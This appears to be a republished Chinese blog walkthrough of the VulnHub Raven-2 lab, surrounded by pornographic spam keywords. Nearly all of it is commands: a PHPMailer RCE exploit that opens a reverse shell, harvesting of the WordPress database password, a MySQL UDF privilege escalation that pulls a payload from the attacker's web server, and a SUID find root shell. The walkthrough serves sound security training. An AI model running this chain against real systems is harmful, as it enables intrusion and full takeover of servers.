日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

靶场练习第二十五天~vulnhub靶场之Raven-2

發布時間:2023/12/1 编程问答 60 豆豆
生活随笔 收集整理的這篇文章主要介紹了 靶场练习第二十五天~vulnhub靶场之Raven-2 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、準備工作

kali和靶機都選擇NAT模式(kali與靶機同網段)

1.靶場環境

下載鏈接:Raven: 2 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶機的ip

掃描靶機ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)掃描靶機開放的端口及其服務

nmap -A 192.168.101.128

2.網站的信息收集

(1)靶機開放了80端口,先訪問靶機網站看看有什么有用的信息

訪問靶機網站,沒有發現什么信息

(2)dirb掃描靶機網站

dirb http://192.168.101.128

1)發現dirb掃描到的網站除了一個wordpress其他都是文件目錄,可能存在文件目錄瀏覽漏洞

2)對目錄文件進行排查,在vendor目錄下的PATH文件里找到了第一個flag

3)在vendor目錄下的README.md里面看到了PHPMailer(一個功能齊全的PHP電子郵件創建和傳輸類)

4)在VERSION目錄文件中得知PHPMailer版本號為5.2.16

知識點:PHPMailer < 5.2.18版本存在安全漏洞,可使未經身份驗證的遠程攻擊者在Web服務器用戶上下文中執行任意代碼,遠程控制目標web應用

三、漏洞發現及利用

(1)searchsploit命令搜索到可利用的漏洞

searchsploit PHPMailer

1)將相關的腳本文件拷貝

cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./

2)修改腳本內容

vim 40974.py

:wq

3)在攻擊機kali終端開啟監聽端口4444

nc -lvvp 4444

4)運行腳本

python 40974.py

如果報錯執行下面的命令

pip install requests-toolbelt

編碼問題就在第一行腳本里面添加

#! /usr/bin/python3$

# -*- coding: utf-8 -*-$

如果兩個都不行嘗試一下下面的命令

python3 40974.py

我這里提示是說未聲明編碼,所以在腳本第一行添加

原來是我的python是python3

5)先訪問 http://192.168.101.128:80/contact.php,就會生成后門文件 shell1.php,再訪問 http://192.168.101.128/shell1.php,就成功反彈了一個shell到攻擊機上

6)看看kali那邊情況,成功監聽

四、提權

1.優化命令執行終端,執行下面命令進入python交互式(注意要下載python環境才能運行):

python -c 'import pty; pty.spawn("/bin/bash");'

2.尋找flag文件

find ./ -name flag*

3.查看剛才尋找到的flag2文件

cat /var/www/flag2.txt

4.flag3為圖片,網站下查看

http://192.168.101.128/wordpress/wp-content/uploads/2018/11/flag3.png

5. 查看mysql的config配置文件

cd /var/www/html/wordpress

ls -al

cat wp-config.php

6.發現了網站的mysql數據庫,數據庫的賬號密碼root:R@v3nSecurity

mysql -u root -pR@v3nSecurity

7.mysql

1)查看數據庫

show databases;

2)在kali終端查找腳本

searchsploit 1518.c

3)腳本下載到靶機

1.復制腳本

cp /usr/share/exploitdb/exploits/linux/local/1518.c .

2.gcc 編譯、運行

gcc -g -shared -o x7.so 1518.c -lc

3.kali開啟http服務

python -m SimpleHTTPServer

4.靶機下載腳本

cd /tmp

wget http://192.168.101.10:8000/x7.so

ls

4)進入數據庫創建數據表 foo,向表中插入二進制數據,然后利用dumpfile函數把文件導出, 再新建存儲函數do_system類型是integer,別名(soname)文件名字

mysql -u root -pR@v3nSecurity

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/x7.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/x7.so';

create function do_system returns integer soname 'x7.so';

select * from mysql.func;

5)通過do_system函數給find命令所有者的suid權限,使其可以執行root權限的命令

select do_system('chmod u+s /usr/bin/find');

exit

8.提權

find / -exec "/bin/sh" \;

1)flag4

cd /root

cat flag4.txt

總結

以上是生活随笔為你收集整理的靶场练习第二十五天~vulnhub靶场之Raven-2的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 久久国语对白 | 日本五十路 | 午夜成人亚洲理伦片在线观看 | 欧美高清精品一区二区 | 色婷婷一区二区三区四区 | 一曲二曲三曲在线观看中文字幕动漫 | 午夜精品久久久久久久第一页按摩 | 国产不卡在线 | 精品国产青草久久久久96 | 日韩欧美国产视频 | 国产性av | 91精品久久香蕉国产线看观看 | 91丨九色丨丰满 | 日本女v片| 免费看三级黄色片 | 成人a级大片 | 亚洲妇女av | 亚洲午夜久久久久 | 中文日韩欧美 | 精品国产91乱码一区二区三区 | 在线免费观看视频你懂的 | 久久久久久久久久久久久久久久久久久久 | 无码精品人妻一区二区三区漫画 | 国产欧美一级片 | 91不卡在线| 国产精品13p | 荷兰女人裸体性做爰 | 色老头综合网 | 亚洲激情av在线 | 午夜欧美日韩 | www.日本精品| 影音先锋黄色资源 | 中文字幕高清在线观看 | 性猛交xxxx乱大交3 | www四虎 | 国精产品一品二品国精品69xx | 你懂的国产在线 | 国产精品免费入口 | 一区二区三区欧美在线 | 三级全黄的视频 | 日本做爰三级床戏 | 欧美毛片网站 | 欧美日韩在线观看一区二区 | av成人亚洲 | 午夜av剧场 | 99r精品视频 | 国产成人资源 | 西西444www大胆无视频 | 亚洲怡红院av| 欧美破处女 | 日本va欧美va精品发布 | 亚洲女人天堂成人av在线 | a级片久久 | 黄色小视频免费网站 | 国产特级av | 亚洲激情图 | 日韩熟女一区二区 | 天天曰天天爽 | 伊人久久亚洲综合 | 撸啊撸在线视频 | 女~淫辱の触手3d动漫 | 国产精品无码毛片 | 国产精品麻豆成人av电影艾秋 | 丁香花电影免费播放电影 | 97精品视频 | 日韩一区二区三区av | 日韩欧美中文字幕一区二区 | 午夜寂寞福利 | 精品欧美一区二区三区久久久 | 成人精品一区二区三区电影黑人 | 亚洲高清在线观看 | 日本毛片在线 | 操少妇视频 | 日韩欧美在线一区二区三区 | 四虎影视成人永久免费观看亚洲欧美 | 成人精品在线看 | 最近日韩免费视频 | 国产精品不卡 | 97人妻人人揉人人躁人人 | 午夜av免费在线观看 | 亚洲国产成人va在线观看天堂 | 国产精品原创 | 97欧美 | 毛片的网址 | 亚洲逼图 | 久久五月激情 | 亚洲精品国产福利 | 九九热精品视频在线观看 | 51国产在线 | 色呦呦一区二区三区 | 手机av资源 | 日本免费不卡视频 | 边吃奶边添下面好爽 | 国产亚洲欧洲 | 快色视频在线观看 | 黑人专干日本人xxxx | 在线视频观看你懂得 | jizz美女 | 高h免费视频 |